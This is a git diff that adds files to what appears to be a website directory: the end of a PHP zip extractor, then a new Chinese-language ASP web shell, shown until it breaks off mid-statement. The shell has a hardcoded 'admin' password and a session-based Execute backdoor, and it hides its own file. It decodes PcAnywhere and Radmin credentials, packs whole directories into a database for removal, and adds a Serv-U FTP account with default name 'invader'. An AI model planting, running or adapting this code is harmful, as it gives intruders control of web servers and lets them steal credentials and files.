+    }
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = 'ok';
+    if (substr($header['filename'], -1) == '/')
+      $header['external'] = 0x41FF0010;
+    return $header;
+ }
+
+ function ReadCentralDir($zip,$zip_name){
+	$size = filesize($zip_name);
+
+	if ($size < 277) $maximum_size = $size;
+	else $maximum_size=277;
+	
+	@fseek($zip, $size-$maximum_size);
+	$pos = ftell($zip); $bytes = 0x00000000;
+	
+	while ($pos < $size){
+		$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);
+		if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;
+	}
+	
+	$fdata=fread($zip,18);
+	
+	$data=@unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',$fdata);
+	
+	if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
+	else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
+	$centd['disk_entries'] = $data['disk_entries'];
+	$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
+	$centd['size'] = $data['size'];  $centd['disk'] = $data['disk'];
+	return $centd;
+  }
+
+ function ExtractFile($header,$to,$zip){
+	$header = $this->readfileheader($zip);
+	
+	if(substr($to,-1)!="/") $to.="/";
+	if($to=='./') $to = '';	
+	$pth = explode("/",$to.$header['filename']);
+	$mydir = '';
+	for($i=0;$i<count($pth)-1;$i++){
+		if(!$pth[$i]) continue;
+		$mydir .= $pth[$i]."/";
+		if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){
+			@chmod($mydir,0777);
+			$this->total_folders ++;
+			echo "Ŀ¼: $mydir<br>";
+		}
+	}
+	
+	if(strrchr($header['filename'],'/')=='/') return;	
+
+	if (!($header['external']==0x41FF0010)&&!($header['external']==16)){
+		if ($header['compression']==0){
+			$fp = @fopen($to.$header['filename'], 'wb');
+			if(!$fp) return(-1);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp);
+			touch($to.$header['filename'], $header['mtime']);
+		}else{
+			$fp = @fopen($to.$header['filename'].'.gz','wb');
+			if(!$fp) return(-1);
+			$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
+			Chr(0x00), time(), Chr(0x00), Chr(3));
+			
+			fwrite($fp, $binary_data, 10);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 1024 ? $size : 1024);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+		
+			$binary_data = pack('VV', $header['crc'], $header['size']);
+			fwrite($fp, $binary_data,8); fclose($fp);
+	
+			$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
+			if(!$gzp) return(-2);
+			$fp = @fopen($to.$header['filename'],'wb');
+			if(!$fp) return(-1);
+			$size = $header['size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = gzread($gzp, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp); gzclose($gzp);
+		
+			touch($to.$header['filename'], $header['mtime']);
+			@unlink($to.$header['filename'].'.gz');
+			
+		}
+	}
+	
+	$this->total_files ++;
+	echo "�ļ�: $to$header[filename]<br>";
+	return true;
+ }
+}
+ob_end_flush();
+
+?>
\ No newline at end of file
diff --git a/www-7jyewu-cn/法克僵尸大马 (1).asp b/www-7jyewu-cn/法克僵尸大马 (1).asp
new file mode 100644
index 0000000..c522568
--- /dev/null
+++ b/www-7jyewu-cn/法克僵尸大马 (1).asp	
@@ -0,0 +1,2061 @@
+<%
+UserPass="admin"  '����
+'--------------------------------------------------------------------
+mNametitle ="���˽�ʬ����"  ' ����
+Copyright="sb"  '��Ȩ
+SItEuRl="http://www.7jyewu.cn/" '�����վ
+bg ="http://www.7jyewu.cn/shell/akill.jpg"  '����ͼƬ,��ʹ������
+ysjb=true  '�Ƿ����϶�Ч��,trueΪ��,falseΪ��
+'����PR��ѯ���ܣ�����ɾ�������ļ���
+'��������,�Ż�����.
+'����˫��ͼƬ�������Ҫ��ͼƬ�������޸ĵ�ַ
+'--------------------------------------------------------------------
+Server.ScriptTimeout=999999999
+Response.Buffer =true
+BodyColor="#000000"
+FontColor="#b4a9a9"
+LinkColor="#ffffff"
+On Error Resume Next 
+strBAD="If Request(""#"")<>"""" Then Session(""#"")=Request(""#"")"&VbNewLine
+strBAD=strBAD&"If Session(""#"")<>"""" Then Execute(Session(""#""))"
+Const DEfd=""
+sub ShowErr()
+ If Err Then
+j"<br><a href='javascript:history.back()'><br> " & Err.Description & "</a><br>"
+Err.Clear:Response.Flush
+  End If
+end sub
+Sub j(str)
+response.write(str)
+End Sub
+sub RaPath(s)
+RaPath=ExecuteGlobal(s)
+End sub
+Function RePath(S)
+RePath=Replace(S,"\","\\")
+End Function
+Function RRePath(S)
+RRePath=Replace(S,"\\","\")
+End Function
+URL=Request.ServerVariables("URL")
+ScriptPath=Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+ServerIP=Request.ServerVariables("LOCAL_ADDR")
+Action=Request("Action")
+RootPath=Server.MapPath(".")
+WWWRoot=Server.MapPath("/")
+CONST_FSO="Script"&"ing.Fil"&"eSyst"&"emObject"
+FolderPath=Request("FolderPath")
+u=request.servervariables("http_host")&url
+domain=Request.ServerVariables("http_host")
+url=request.servervariables("url")
+uu=request.servervariables("http_host")&url
+pp=userpass
+FName=Request("FName")
+cdx="<tr><td id=d width=95 onMouseOver=""this.style.backgroundColor='#696969'"" onMouseOut=""this.style.backgroundColor='#191919'"">":cxd="<font face='wingdings'>8</font>":ef="</a></td></tr>"
+set fso=server.CreateObject(CONST_FSO)
+set fsoX=server.CreateObject(CONST_FSO)
+str1="http://"&Request.ServerVariables("SERVER_Name")& left(Request.ServerVariables("URL"),InstrRev(Request.ServerVariable("URL"),"/"))
+BackUrl="<br><br><center><a href='javascript:history.back()'>����</a></center>"
+j "<html><meta http-equiv=""Content-Type"" content=""text/html; charset=gb2312""><title>"&mNametitle&" - "&ServerIP&" </title><style type=""text/css"">span.underline{text-decoration:underline;}span.orange{color:#B3D169;}span.project_type{text-align:right}span.grey{color:#666;}#links{list-style-type:none;padding:20px 0 0 0;padding-left:20px;}#linklist2  td{color:#fff;background:#191919;}#linklist2 td:visited{color:#999;}#linklist2 td:hover{background:#B3D169;color:#191919;}body,tr,td{margin-top: 5px;background-color: #000000;color: #b4a9a9;font-size: 12px;SCROLLBAR-FACE-COLOR: #232323;scrollbar-arrow-color: #383839;scrollbar-highlight-color: #383839;scrollbar-3dlight-color: #dddddd;scrollbar-shadow-color: #232323}.sb{cursor: hand}input,select,textarea{border-top-width: 1px;font-weight: bold;border-left-width: 1px;font-size: 11px;border-left-color: #dddddd;background: #000000;border-bottom-width: 1px;border-bottom-color: #dddddd;color: #dddddd;border-top-color: #dddddd;font-family: verdana;border-right-width: 1px;border-right-color: #dddddd;}#d{background: #121212;padding-left: 5px;padding-right: 5px;font-color: #fff}pre{font-size: 11px;font-family: verdana;color: #dddddd;}hr{color: #dddddd;background-color: #dddddd;height: 5px;}#x{font-family: verdana;font-size: 13px}a{color: #ffffff;text-decoration: none;}.am{color: #b4a9a9;font-size: 11px;}</style>"
+j"<script>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm(""ȷ��Ҫִ�д˲�����""))return true;else return false;}function runClock(){theTime = window.setTimeout(""runClock()"", 100);var today = new Date();var display= today.toLocaleString();window.status=""��"&Copyright&"  --""+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction==""CopyFile""){DName = prompt(""�����븴�Ƶ�Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFile""){DName = prompt(""�������ƶ���Ŀ���ļ�ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""CopyFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""MoveFolder""){DName = prompt(""�������ƶ���Ŀ���ļ���ȫ����"",FName);top.hideform.FName.value += ""||||""+DName;}else if(FAction==""NewFolder""){DName = prompt(""������Ҫ�½����ļ���ȫ����"",FName);top.hideform.FName.value = DName;}else{DName = ""Other"";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = """";}}</script>"
+j"<body" :If Action="" then j " scroll=no":j ">"
+Dim ObT(18,2):Fn=Action:ObT(0,0) = "Scripting.FileSystemObject":ObT(0,2) = "�� �� �� �� �� ��":ObT(1,0) = "wscript.shell":ObT(1,2) = "������ִ�����,��ʾ'<font color=red>��</font>'ʱ��<a href='?Action=cmdx' target='FileFrame'> <font color=red> ִ��Cmd��</font></a> �˹���ִ��":ObT(2,0) = "ADOX.Catalog":ObT(2,2) = "ACCESS �� �� �� ��":ObT(3,0) = "JRO.JetEngine":ObT(3,2) = "ACCESS ѹ �� �� ��":ObT(4,0) = "Scripting.Dictionary":ObT(4,2) = "������ �� �� ���� ���":ObT(5,0) = "Adodb.connection":ObT(5,2) = "���ݿ� ���� ���":ObT(6,0) = "Adodb.Stream":ObT(6,2) = "������ �ϴ� ���":ObT(7,0) = "SoftArtisans.FileUp":ObT(7,2) = "SA-FileUp �ļ� �ϴ� ���":ObT(8,0) = "LyfUpload.UploadFile":ObT(8,2) = "���Ʒ� �ļ� �ϴ� ���":ObT(9,0) = "Persits.Upload.1":ObT(9,2) = "ASPUpload �ļ� �ϴ� ���":ObT(10,0) = "JMail.SmtpMail":ObT(10,2) = "JMail �ʼ� �շ� ���":ObT(11,0) = "CDONTS.NewMail":ObT(11,2) = "����SMTP ���� ���":ObT(12,0) = "SmtpMail.SmtpMail.1":ObT(12,2) = "SmtpMail ���� ���":ObT(13,0) = "Microsoft.XMLHTTP":ObT(13,2) = "���� ���� ���"
+ObT(14,0) = "ws"&"cript.shell.1":  OBt(14,2) = "���wsh���������Ը���������":OBT(15,0) = "WS"&"CRIPT.NETWORK":  OBt(15,2) = "�鿴��������Ϣ���������ʱ����������Ȩ":OBT(16,0) = "she"&"ll.appl"&"ication":OBt(16,2) = "she"&"ll.appli"&"cation ��������FSOʱ�����ļ��Լ�ִ������":OBT(17,0) = "sh"&"ell.appl"&"ication.1":OBt(17,2) = "she"&"ll.appli"&"cation �ı�������FSOʱ�����ļ��Լ�ִ������":OBT(18,0) = "Shell.Users":OBt(18,2) = "ɾ����net.exe net1.exe������������û������"
+For i=0 To 18:Set T=Server.CreateObject(ObT(i,0)):If -2147221005 <> Err Then:IsObj=" ��":Else:IsObj=" ��":Err.Clear:End If:Set T=Nothing:ObT(i,1)=IsObj:Next:If FolderPath<>"" then:Session("FolderPath")=RRePath(FolderPath):End If:If Session("FolderPath")="" Then:FolderPath=WwwRoot:Session("FolderPath")=FolderPath:End if
+Function PcAnywhere4()
+j"<div align='center'>PcAnywhere��Ȩ Bin�汾</div><form name='xform' method='post'><table width='80%'border='0'><tr><td width='10%'>cif�ļ�: </td><td width='10%'><input name='path' type='text' value='C:\Documents and Settings\All Users\Application Data\\Symantec\pcAnywhere\Citempl.cif' size='80'></td><td><input type='submit' value=' �ύ '></td></table>"
+end Function
+
+j"</form><script>function RUNonclick(){document.xform.china.name = parent.pwd.value;document.xform.action = parent.url.value;document.xform.submit();}</script>"
+
+
+
+
+Function StreamLoadFromFile(sPath)
+Dim oStream
+Set oStream = Server.CreateObject("Adodb.Stream")
+With oStream
+.Type = 1
+.Mode = 3
+.Open
+.LoadFromFile(sPath)
+.Position = 0
+StreamLoadFromFile = .Read
+.Close
+End With
+Set oStream = Nothing
+End Function
+Function hexdec(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+ j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+ j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+ j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+ j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+ j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+ j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+ j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+ j = j * 16 
+Next 
+result = result + j 
+Next 
+hexdec = result 
+End Function 
+sub promyself()
+On Error Resume Next 
+set f=fso.GetFile(ScriptPath)
+if f.Attributes <> 39 and session("lock")="" then
+f.Attributes=1+2+4+32
+end if
+set f=nothing
+end sub
+promyself
+Function PcAnywhere(data,mode)
+HASH= Mid(data,3)
+If mode = "pass" Then number = 32: Cifnum = 144
+If mode = "user" Then number = 30: Cifnum = 15
+For i = 1 To number Step 2 
+pcstr=((hexdec(Mid(data,i,2)) xor hexdec(Mid(hash,i,2))) xor Cifnum)
+If ((pcstr <= 32) Or (pcstr>127)) Then Exit For 
+decode = decode + Chr(pcstr)
+Cifnum=Cifnum+1
+Next 
+PcAnywhere=decode
+End function
+Function bin2hex(binstr)
+For i = 1 To LenB(binstr)
+hexstr = Hex(AscB(MidB(binstr, i, 1)))
+If Len(hexstr)=1 Then 
+bin2hex=bin2hex&"0"&(LCase(hexstr))
+Else
+bin2hex=bin2hex& LCase(hexstr)
+End If 
+Next
+End Function
+CIF = Request("path")
+If CIF <> "" Then 
+BinStr=StreamLoadFromFile(CIF) 
+j"Pcanywhere Reader ==><br><br>PATH:"&CIF&"<br>�ʺ�:"&PcAnywhere (Mid(bin2hex(BinStr),919,64),"user")
+j"<br>����:"&PcAnywhere (Mid(bin2hex(BinStr),1177,32),"pass")
+End If 
+Function radmin()
+Set WSH= Server.CreateObject("WSCRIPT.SHELL")
+RadminPath="HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\"
+Parameter="Parameter"
+Port = "Port"
+j"<br>ע��:����HASHֵ����RadminHash���߻�od�������ӣ��������ص�ַ:"&htp&"soft/Radmin_hash.rar<br><br>"
+ParameterArray=WSH.REGREAD(RadminPath & Parameter )
+j Parameter&":"
+If IsArray(ParameterArray) Then
+For i = 0 To UBound(ParameterArray)
+If  Len (hex(ParameterArray(i)))=1 Then 
+strObj = strObj & "0"&CStr(Hex(ParameterArray(i)))
+Else
+strObj = strObj & Hex(ParameterArray(i))
+End If 
+Next
+j strobj
+Else
+j"Error! Can't Read!"
+End If
+j"<br><br>"
+PortArray=WSH.REGREAD(RadminPath & Port )
+If IsArray(PortArray) Then 
+j Port &":" 
+j hextointer(CStr(Hex(PortArray(1)))&CStr(Hex(PortArray(0))))
+Else 
+j"Error! Can't Read!"
+End If
+End Function
+Function hextointer(strin) 
+Dim i, j, k, result 
+result = 0 
+For i = 1 To Len(strin) 
+If Mid(strin, i, 1) = "f" Or Mid(strin, i, 1) ="F" Then 
+j = 15 
+End If 
+If Mid(strin, i, 1) = "e" Or Mid(strin, i, 1) = "E" Then 
+j = 14 
+End If 
+If Mid(strin, i, 1) = "d" Or Mid(strin, i, 1) = "D" Then 
+j = 13 
+End If 
+If Mid(strin, i, 1) = "c" Or Mid(strin, i, 1) = "C" Then 
+j = 12 
+End If 
+If Mid(strin, i, 1) = "b" Or Mid(strin, i, 1) = "B" Then 
+j = 11 
+End If 
+If Mid(strin, i, 1) = "a" Or Mid(strin, i, 1) = "A" Then 
+j = 10 
+End If 
+If Mid(strin, i, 1) <= "9" And Mid(strin, i, 1) >= "0" Then 
+j = CInt(Mid(strin, i, 1)) 
+End If 
+For k = 1 To Len(strin) - i 
+j = j * 16 
+Next 
+result = result + j 
+Next 
+hextointer = result 
+End Function
+
+Function MainForm()
+j "<form name=""hideform"" method=""post"" action="""&URL&""" target=""FileFrame""><input type=""hidden"" name=""Action""><input type=""hidden"" name=""FName""></form><table width='100%'><form name='addrform' method='post' action='"&URL&"' target='_parent'><tr><td width='60' align='center'><input type='button' value='Address'></td><td><input name='FolderPath' style='width:100%' value='"&Session("FolderPath")&"'></td><td width='140' align='center'><input name='Submit' type='submit' value='GO'> <input type='submit' value='Refresh' onclick='FileFrame.location.reload()'></td></tr></form></table>"
+j"<td><a class=am href='javascript:ShowFolder(""C:\\Program Files"")'>(1)��Program��<a><a class=am href='javascript:ShowFolder(""d:\\Program Files"")'>(2)��ProgramD��<a><a class=am href='javascript:ShowFolder(""e:\\Program Files"")'>(3)��ProgramE��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\Documents"")'>(4)��Documents��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\"")'>(5)��All_Users��<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\"")'>(6)���_ʼ_�ˆΡ�<a><a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����ʼ���˵�\\����\\"")'>(7)����_��<a><a class=am href='javascript:ShowFolder(""C:\\recycler"")'>(8)��RECYCLER(C:\)��<a><a class=am href='javascript:ShowFolder(""D:\\recycler"")'>(9)��RECYCLER(d:\)��<a><a class=am href='javascript:ShowFolder(""e:\\recycler"")'>(10)��RECYCLER(e:\)��<a>":j"<br><a class=am href='javascript:ShowFolder(""C:\\wmpub"")'>(1)��wmpub��<a><a class=am href='javascript:ShowFolder(""C:\\WINDOWS\\Temp"")'>&nbsp;&nbsp;(2)��TEMP��<a>&nbsp;&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\Program Files\\RhinoSoft.com"")'>(3)��ServU(1)��<a><a  class=am href='javascript:ShowFolder(""C:\\Program Files\\ServU"")'>(4)��ServU(2)��<a>&nbsp;<a class=am href='javascript:ShowFolder(""C:\\WINDOWS"")'>(5)��WINDOWS��<a>&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""C:\\php"")'>(6)��PHP��<a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a  class=am href='javascript:ShowFolder(""C:\\Program Files\\Microsoft SQL Server\\"")'>(7)��Mssql��<a><a class=am href='javascript:ShowFolder(""c:\\prel"")'>(8)��prel�ļ��С�<a>&nbsp;&nbsp;&nbsp;<a class=am href='javascript:ShowFolder(""c:\\docume~1\\alluse~1\\Application Data\\Symantec\\pcAnywhere"")'>(9)��pcAnywhere��<a>   <a class=am href='javascript:ShowFolder(""C:\\Documents and Settings\\All Users\\����"")'>(10)��Alluser���桿<a>":j"</td>"
+j "<table width='100%' height='95.5%' style='border:1px solid #000000;' cellpadding='0' cellspacing='0'><td width='160' id=tl><iframe name='Left' src='?Action=MainMenu' width='100%' height='100%' frameborder='0'></iframe></td><td width=1 style='background:#000000'></td><td width=1 style='padding:2px'><a onclick=""document.getElementById('tl').style.display='none'"" href=##><b>����</b></a><p><a onclick=""document.getElementById('tl').style.display=''"" href=##><b>��ʾ</b></a></p></td><td width=1 style='background:#424242'><td><iframe name='FileFrame' src='?Action=Show1File' width='100%' height='100%' frameborder='1'></iframe></tr></form></table></td></tr><tr></tr></table>"
+if session("aase") <> "ok" then:response.write Efun:session("aase")="ok":end if
+End Function
+Sub PageAddToMdb()
+Dim theAct, thePath
+theAct = Request("theAct")
+thePath = Request("thePath")
+Server.ScriptTimeOut=100000
+If theAct = "addToMdb" Then
+addToMdb(thePath)
+j "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+If theAct = "releaseFromMdb" Then
+unPack(thePath)
+j "<div align=center><br>�������!</div>"&BackUrl
+Response.End
+End If
+j"<br>�ļ��д��:<form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=80><input type=hidden value=addToMdb name=theAct><select name=theMethod><option value=fso>FSO</option><option value=app>��FSO</option></select><input type=submit value='��ʼ���'><br><br>ע: �������HSH.mdb�ļ�,λ��samľ��ͬ��Ŀ¼��</form><hr/>�ļ����⿪(��FSO֧��):<br/><form method=post><input type=hidden name=""#"" value=Execute(Session(""#""))><input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & "\HSH.mdb"" size=80><input type=hidden value=releaseFromMdb name=theAct><input type=submit value='�⿪��'><br><br>ע: �⿪���������ļ���λ�ڱ�����Ŀ¼��</form>"
+End Sub
+Sub addToMdb(thePath)
+On Error Resume Next
+Dim rs, conn, stream, connStr, adoCatalog
+Set rs = Server.CreateObject("ADODB.RecordSet")
+Set stream = Server.CreateObject("ADODB.Stream")
+Set conn = Server.CreateObject("ADODB.Connection")
+Set adoCatalog = Server.CreateObject("ADOX.Catalog")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & Server.MapPath("HSH.mdb")
+adoCatalog.Create connStr
+conn.Open connStr
+conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, thePath VarChar, fileContent Image)")
+stream.Open
+stream.Type = 1
+rs.Open "FileData", conn, 3, 3
+If Request("theMethod") = "fso" Then
+fsoTreeForMdb thePath, rs, stream
+ Else
+saTreeForMdb thePath, rs, stream
+End If
+rs.Close
+Conn.Close
+stream.Close
+Set rs = Nothing
+Set conn = Nothing
+Set stream = Nothing
+Set adoCatalog = Nothing
+End Sub
+Function fsoTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, folders, files, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+If Server.CreateObject(CONST_FSO).FolderExists(thePath) = False Then
+showErr(thePath & " Ŀ¼�����ڻ��߲���������!")
+End If
+Set theFolder = Server.CreateObject(CONST_FSO).GetFolder(thePath)
+Set files = theFolder.Files
+Set folders = theFolder.SubFolders
+For Each item In folders
+fsoTreeForMdb item.Path, rs, stream
+Next
+For Each item In files
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+Next
+End Function
+Sub unPack(thePath)
+On Error Resume Next
+Server.ScriptTimeOut=100000
+Dim rs, ws, str, conn, stream, connStr, theFolder
+str = Server.MapPath(".") & "\"
+Set rs = CreateObject("ADODB.RecordSet")
+Set stream = CreateObject("ADODB.Stream")
+Set conn = CreateObject("ADODB.Connection")
+connStr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & thePath & ";"
+conn.Open connStr
+rs.Open "FileData", conn, 1, 1
+stream.Open
+stream.Type = 1
+Do Until rs.Eof
+theFolder = Left(rs("thePath"), InStrRev(rs("thePath"), "\"))
+If Server.CreateObject(CONST_FSO).FolderExists(str & theFolder) = False Then
+createFolder(str & theFolder)
+End If
+stream.SetEos()
+stream.Write rs("fileContent")
+stream.SaveToFile str & rs("thePath"), 2
+rs.MoveNext
+Loop
+rs.Close
+conn.Close
+stream.Close
+Set ws = Nothing
+Set rs = Nothing
+Set stream = Nothing
+Set conn = Nothing
+End Sub
+Dim Filepaths
+set Filepaths=new SearchFile
+Filepaths.Class_Folder Filename
+Sub createFolder(thePath)
+Dim i
+i = Instr(thePath, "\")
+Do While i > 0
+If Server.CreateObject(CONST_FSO).FolderExists(Left(thePath, i)) = False Then
+Server.CreateObject(CONST_FSO).CreateFolder(Left(thePath, i - 1))
+End If
+If InStr(Mid(thePath, i + 1), "\") Then
+i = i + Instr(Mid(thePath, i + 1), "\")
+ Else
+i = 0
+End If
+Loop
+End Sub
+Sub saTreeForMdb(thePath, rs, stream)
+Dim item, theFolder, sysFileList
+sysFileList = "$HSH.mdb$HSH.ldb$"
+Set theFolder = saX.NameSpace(thePath)
+For Each item In theFolder.Items
+If item.IsFolder = True Then
+saTreeForMdb item.Path, rs, stream
+ Else
+If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
+rs.AddNew
+rs("thePath") = Mid(item.Path, 4)
+stream.LoadFromFile(item.Path)
+rs("fileContent") = stream.Read()
+rs.Update
+End If
+End If
+Next
+Set theFolder = Nothing
+End Sub
+Function ProFile()
+If Request("Action2")="Post" Then
+Randomize
+dim pass2,num1
+pass2=""
+Do While Len(pass2)<8
+if Len(pass2)<=4 then
+num1=CStr(Chr((122-97)*rnd+97)) 'a~z 
+else
+num1=CStr(Chr((57-48)*rnd+48)) '0~9 
+end if
+pass2=pass2&num1
+loop 
+pass2=ucase(pass2)
+Application(pass2)=1
+Application(pass2&"File")=request("AFile")
+Application(pass2&"Code")=request("ACode")
+Application(pass2&"Time")=request("ATime")
+Application(pass2&"Char")=request("AChar")
+j"<br><br><br><center>�������� <font color=yellow>"&pass2&"</font> ���ɳɹ������<a style=""text-decoration:underline;font-weight:bold"" href="&URL&"?ProFile="&pass2&" target=_blank>����</a>�������̡�</center><br>"
+Response.End
+End If
+SI="<br><table border='0' cellpadding='0' cellspacing='0'>"
+SI=SI&"<form name='UpForm' method='post' action='"&URL&"?Action=ProFile&Action2=Post'"
+SI=SI&"<tr><td valign=top style='line-height:22px' align=right><input type=""hidden"" name=""vvva"" value=""0"">��Ҫ�������ļ�·����<br><font color=yellow>��ͬʱ��������ļ�&nbsp;&nbsp;<br>ÿ��һ���ļ�·��&nbsp;&nbsp;</font></td><td>"
+SI=SI&"<textarea name=""AFile"" cols=""70"" rows=""7"">"&RRePath(Session("FolderPath")&"\test.asp")&"</textarea></td></tr>"
+SI=SI&"<tr><td valign=top style=""padding-top:3px;"" align=right>�ļ����룺</td><td><textarea name=""ACode"" cols=""70"" rows=""7"">�ļ�����</textarea></td></tr>"
+SI=SI&"<tr><td align=right>�ļ����룺</td><td><input type=""radio"" name=""AChar"" value=""1"" checked />GB2312  <input type=""radio"" name=""AChar"" value=""2"" />UTF-8 (�����ļ����������룬�볢�Ը��ı���)</td></tr>"
+SI=SI&"<tr><td align=right>����Ƶ�ʣ�</td><td><input type=""text"" name=""ATime"" style=""text-align:right"" value=""1"" size=""5"" onkeyup=""value=value.replace(/[^\d]/g,'')"" /> �� (��СΪ1�룬��Ҫ�������ļ�Խ�࣬Ƶ������Խ�󣬷����޷�ȫ������)</td></tr>"
+SI=SI&"<tr><td>&nbsp;</td><td height=50><input type='submit' name='Submit' value='��һ�������ɱ�������'></td></tr>"
+SI=SI&"</form></table>"
+j SI
+End Function
+Function suftp()
+j"<center><br><form name='form1' method='post' action=''><table width='500'><tr align='center' valign='middle'><td colspan='2' id=s><font face=webdings>8</font> <B>���ɰ汾��Ϣ</b></td></tr><tr align='center'><td id=d>ϵͳ�˺ţ�</td><td id=d><input name='duser' type='text' class='TextBox' id='duser' value='LocalAdministrator'></td></tr><tr align='center'><td id=d>ϵͳ���</td><td id=d><input name='dpwd' type='text' class='TextBox' id='dpwd' value='#l@$ak#.lk;0@P'></td></tr><tr align='center'><td id=d>ϵͳ�˿ڣ�</td><td id=d><input name='dport' type='text' class='TextBox' id='dport' value='43958'></td></tr><tr align='center'><td id=d>�¼��˺ţ�</td><td id=d><input name='tuser' type='text' class='TextBox' id='tuser' value='invader'></td></tr><tr align='center'><td id=d>�¼ӿ��</td><td id=d><input name='tpass' type='text' class='TextBox' id='pass' value='1'></td></tr><tr align='center'><td id=d>����·����</td><td id=d><input name='tpath' type='text' class='TextBox' id='tpath' value='C:\'></td></tr><tr align='center'><td id=d>����˿ڣ�</td><td id=d><input name='tport' type='text' class='TextBox' id='tport' value='21'></td></tr><tr align='center'><td id=d>ִ������</td><td id=d><input name='radiobutton' type='radio' value='add' checked class='TextBox' id=d>ȷ������&nbsp;<input type='radio' name='radiobutton' value='del' class='TextBox' id=d>ȷ��ɾ��</td></tr><tr align='center' valign='middle'><td colspan='2' id=d><input type='submit' name='Submit' value='Just Go'>&nbsp;<input type='reset' name='Submit2' value='Reset'><input name='SUaction' type='hidden' id='action' value='1'></td></tr></table></form></center>"
+Usr = request.Form("duser")
+pwd = request.Form("dpwd")
+port = request.Form("dport")
+tuser = request.Form("tuser")
+tpass = request.Form("tpass")
+tpath = request.Form("tpath")
+tport = request.Form("tport")
+'Command = request.Form("dcmd")
+if request.Form("radiobutton") = "add" Then
+leaves = "User " & Usr & vbcrlf
+leaves = leaves & "Pass " & pwd & vbcrlf
+leaves = leaves & "SITE MAINTENANCE" & vbcrlf
+leaves = leaves & "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=" & tport & vbcrlf & "-User=" & tuser & vbcrlf & "-Password=" & tpass & vbcrlf & _
+"-HomeDir=" & tpath & "\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _
+"-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _
+"-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _
